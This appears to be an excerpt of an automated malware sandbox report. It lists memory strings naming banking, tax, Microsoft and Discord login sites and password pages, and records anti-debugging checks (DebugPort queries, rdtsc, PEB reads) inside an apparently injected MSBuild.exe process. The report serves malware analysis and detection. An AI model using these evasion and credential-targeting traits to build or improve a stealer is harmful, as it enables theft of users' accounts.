Source: -16743.11.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: -16743.11.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: -16743.11.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -16743.11.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: -16743.11.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: -16743.11.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2510689368.000000000084F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: -16743.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: -16743.11.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: -16743.11.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: firefox.exe, 00000011.00000002.2015369937.0000023A7020C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^JWP
Source: -16743.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: -16743.11.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: -16743.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1292388752.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: -16743.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: -16743.11.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: -16743.11.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_010FD1C0 rdtsc

8_2_010FD1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_004176E3 LdrLoadDll,

8_2_004176E3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01140115 mov eax, dword ptr fs:[00000030h]	8_2_01140115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118 mov ecx, dword ptr fs:[00000030h]	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118 mov eax, dword ptr fs:[00000030h]	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118 mov eax, dword ptr fs:[00000030h]	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112A118 mov eax, dword ptr fs:[00000030h]	8_2_0112A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B0124 mov eax, dword ptr fs:[00000030h]	8_2_010B0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107B136 mov eax, dword ptr fs:[00000030h]	8_2_0107B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107B136 mov eax, dword ptr fs:[00000030h]	8_2_0107B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107B136 mov eax, dword ptr fs:[00000030h]	8_2_0107B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107B136 mov eax, dword ptr fs:[00000030h]	8_2_0107B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081131 mov eax, dword ptr fs:[00000030h]	8_2_01081131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081131 mov eax, dword ptr fs:[00000030h]	8_2_01081131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01155152 mov eax, dword ptr fs:[00000030h]	8_2_01155152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01118158 mov eax, dword ptr fs:[00000030h]	8_2_01118158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01079148 mov eax, dword ptr fs:[00000030h]	8_2_01079148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01079148 mov eax, dword ptr fs:[00000030h]	8_2_01079148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01079148 mov eax, dword ptr fs:[00000030h]	8_2_01079148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01079148 mov eax, dword ptr fs:[00000030h]	8_2_01079148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107C156 mov eax, dword ptr fs:[00000030h]	8_2_0107C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01114144 mov eax, dword ptr fs:[00000030h]	8_2_01114144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01114144 mov eax, dword ptr fs:[00000030h]	8_2_01114144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01114144 mov ecx, dword ptr fs:[00000030h]	8_2_01114144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01114144 mov eax, dword ptr fs:[00000030h]	8_2_01114144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01114144 mov eax, dword ptr fs:[00000030h]	8_2_01114144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01087152 mov eax, dword ptr fs:[00000030h]	8_2_01087152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01086154 mov eax, dword ptr fs:[00000030h]	8_2_01086154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01086154 mov eax, dword ptr fs:[00000030h]	8_2_01086154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01119179 mov eax, dword ptr fs:[00000030h]	8_2_01119179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107F172 mov eax, dword ptr fs:[00000030h]	8_2_0107F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010C0185 mov eax, dword ptr fs:[00000030h]	8_2_010C0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110019F mov eax, dword ptr fs:[00000030h]	8_2_0110019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110019F mov eax, dword ptr fs:[00000030h]	8_2_0110019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110019F mov eax, dword ptr fs:[00000030h]	8_2_0110019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110019F mov eax, dword ptr fs:[00000030h]	8_2_0110019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107A197 mov eax, dword ptr fs:[00000030h]	8_2_0107A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107A197 mov eax, dword ptr fs:[00000030h]	8_2_0107A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107A197 mov eax, dword ptr fs:[00000030h]	8_2_0107A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113C188 mov eax, dword ptr fs:[00000030h]	8_2_0113C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113C188 mov eax, dword ptr fs:[00000030h]	8_2_0113C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D7190 mov eax, dword ptr fs:[00000030h]	8_2_010D7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011311A4 mov eax, dword ptr fs:[00000030h]	8_2_011311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011311A4 mov eax, dword ptr fs:[00000030h]	8_2_011311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011311A4 mov eax, dword ptr fs:[00000030h]	8_2_011311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011311A4 mov eax, dword ptr fs:[00000030h]	8_2_011311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109B1B0 mov eax, dword ptr fs:[00000030h]	8_2_0109B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011461C3 mov eax, dword ptr fs:[00000030h]	8_2_011461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011461C3 mov eax, dword ptr fs:[00000030h]	8_2_011461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BD1D0 mov eax, dword ptr fs:[00000030h]	8_2_010BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BD1D0 mov ecx, dword ptr fs:[00000030h]	8_2_010BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011551CB mov eax, dword ptr fs:[00000030h]	8_2_011551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	8_2_010FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	8_2_010FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FE1D0 mov ecx, dword ptr fs:[00000030h]	8_2_010FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	8_2_010FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FE1D0 mov eax, dword ptr fs:[00000030h]	8_2_010FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A51EF mov eax, dword ptr fs:[00000030h]	8_2_010A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010851ED mov eax, dword ptr fs:[00000030h]	8_2_010851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011271F9 mov esi, dword ptr fs:[00000030h]	8_2_011271F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011561E5 mov eax, dword ptr fs:[00000030h]	8_2_011561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B01F8 mov eax, dword ptr fs:[00000030h]	8_2_010B01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01104000 mov ecx, dword ptr fs:[00000030h]	8_2_01104000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E016 mov eax, dword ptr fs:[00000030h]	8_2_0109E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E016 mov eax, dword ptr fs:[00000030h]	8_2_0109E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E016 mov eax, dword ptr fs:[00000030h]	8_2_0109E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109E016 mov eax, dword ptr fs:[00000030h]	8_2_0109E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107A020 mov eax, dword ptr fs:[00000030h]	8_2_0107A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107C020 mov eax, dword ptr fs:[00000030h]	8_2_0107C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114903E mov eax, dword ptr fs:[00000030h]	8_2_0114903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114903E mov eax, dword ptr fs:[00000030h]	8_2_0114903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114903E mov eax, dword ptr fs:[00000030h]	8_2_0114903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114903E mov eax, dword ptr fs:[00000030h]	8_2_0114903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106050 mov eax, dword ptr fs:[00000030h]	8_2_01106050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112705E mov ebx, dword ptr fs:[00000030h]	8_2_0112705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112705E mov eax, dword ptr fs:[00000030h]	8_2_0112705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01082050 mov eax, dword ptr fs:[00000030h]	8_2_01082050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AB052 mov eax, dword ptr fs:[00000030h]	8_2_010AB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01155060 mov eax, dword ptr fs:[00000030h]	8_2_01155060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov ecx, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091070 mov eax, dword ptr fs:[00000030h]	8_2_01091070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AC073 mov eax, dword ptr fs:[00000030h]	8_2_010AC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110106E mov eax, dword ptr fs:[00000030h]	8_2_0110106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD070 mov ecx, dword ptr fs:[00000030h]	8_2_010FD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108208A mov eax, dword ptr fs:[00000030h]	8_2_0108208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107D08D mov eax, dword ptr fs:[00000030h]	8_2_0107D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B909C mov eax, dword ptr fs:[00000030h]	8_2_010B909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AD090 mov eax, dword ptr fs:[00000030h]	8_2_010AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AD090 mov eax, dword ptr fs:[00000030h]	8_2_010AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01085096 mov eax, dword ptr fs:[00000030h]	8_2_01085096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011460B8 mov eax, dword ptr fs:[00000030h]	8_2_011460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011460B8 mov ecx, dword ptr fs:[00000030h]	8_2_011460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011180A8 mov eax, dword ptr fs:[00000030h]	8_2_011180A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov ecx, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov ecx, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov ecx, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov ecx, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010970C0 mov eax, dword ptr fs:[00000030h]	8_2_010970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011550D9 mov eax, dword ptr fs:[00000030h]	8_2_011550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011020DE mov eax, dword ptr fs:[00000030h]	8_2_011020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD0C0 mov eax, dword ptr fs:[00000030h]	8_2_010FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD0C0 mov eax, dword ptr fs:[00000030h]	8_2_010FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A90DB mov eax, dword ptr fs:[00000030h]	8_2_010A90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010880E9 mov eax, dword ptr fs:[00000030h]	8_2_010880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107A0E3 mov ecx, dword ptr fs:[00000030h]	8_2_0107A0E3
